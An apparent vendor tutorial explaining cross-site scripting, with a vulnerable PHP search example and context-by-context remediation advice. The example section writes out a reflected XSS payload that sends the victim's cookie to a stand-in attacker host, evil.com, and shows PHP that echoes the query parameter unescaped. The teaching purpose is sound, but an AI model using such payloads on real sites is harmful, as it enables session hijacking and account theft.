What is Cross Site Scripting and how can you fix it?
Cross Site scripting is a type of attack that can be carried out to compromise users of a website. The exploitation of a XSS flaw enables attackers to inject client-side scripts into web pages viewed by users
Risk of cross site scripting
The attacker may gain access to users cookies, session IDs, passwords, private messages etc. He or she can read and access the content of a page for any attacked user and therefore all the informations displayed to the user. The attacker may also compromise the content shown to the user. A notable attack was the Tweetdeck XSS worm that got published in 2014. It allowed the attacker to spread his malicious payload to all Tweetdeck users via Twitter, hence causing a mass compromise of Twitter accounts.
Example of XSS
Say you have a search box on your site. If there is no result, the site should say “Could not find any pages when searching for [what the user searched for].”.
Doing this in PHP it might look something like this:
<?php // Code for performing the actual search } else { echo "Could not find any pages when searching for ".$_GET['query']; } ?>
This would, in other words, output the user supplied data (the search query) straight into the HTML document. If the search query contains HTML, the users web browser will render it. Imagine an attacker send a link like the following to a victim:
http://example.com/search.php?query=<script>document.InnerHTML += "<img src='http://evil.com/?cookie="+document.cookie+" />";</script>
This would make the victim search for <script>document.InnerHTML += “<img src=‘http://evil.com/?cookie=”+document.cookie+“’/>”</script>. Since there is no validation of the data, the target browser will render:
Could not find any pages when searching for <script>document.InnerHTML += "<img src='http://evil.com?cookie="+document.cookie+"'/>"</script>
The injected HTML will be executed. The HTML contains a script tag which will evaluate JavaScript. The JavaScript will grab the users cookie and send it off bounds to a third party domain of the attackers control. The attacker will then be able to set his own cookie to the victims stolen one, hence gaining access the victims data. This is a common example of a privilege escalation attack by the means of cross site scripting and session riding.
Remediation
The remediation of XSS vulnerabilities are heavily context dependent. The patches vary from time to time. Here are some general tips (where UNTRUSTED is where user supplied data):
HTML Body
Example
<span>UNTRUSTED</span>
Solution Convert to HTML entities (ie. & to & etc). See PHP htmlspecialchars()
HTML Attributes
Example
<input value="UNTRUSTED"> <div attr="UNTRUSTED" />
Solution Convert the untrusted user input to HTML entities to prevent the creation of other attributes. Never let any user data into the “id”, “class” or “name” parameters. Be very cautious when providing user data into DOM event handlers (e.g, onclick), at they are made to execute JavaScript.
Untrusted URL
Example
<a href="UNTRUSTED">link</a> <iframe src="UNTRUSTED" />
Solution URL encode the user data. Whitelist known URLs. Run the user data through a proper URL library in your language. Take notice to the protocol specified. If you expect HTTP or HTTPS links, whitelist those. Prevent the javascript: protocol handler.
GET parameter
Example
<a href="/page?id=UNTRUSTED">link</a>
Solution URL encode the user data. Prevent the use of ampersand as it may lead to parameter pollution issues.
CSS value
Example
<div style="height:UNTRUSTED;"></div>
Solution CSS hex encode the value.
Javascript variable
Example
<script>var value='UNTRUSTED';</script>
Solution Quote around variable and hex encode. Prevent line breaks.
DOM XSS
Example
element.innerHTML = UNTRUSTED
Solution Sanitize using a library written in the language you use. Enforce the use of safer functions whenever applicable (like, innerText instead of innerHTML). Be vary careful of what data is allowed to be printed. It’s better to have a whitelist of allowed characters than a blacklist.
For more extensive list, see OWASP XSS prevention tips.
Detectify checks for Cross Side Scripting, so as soon as you have pushed any new code – go to Detectify and test it!
Resources
OWASP XSS
PHP htmlspecialchars()
HTML Purifier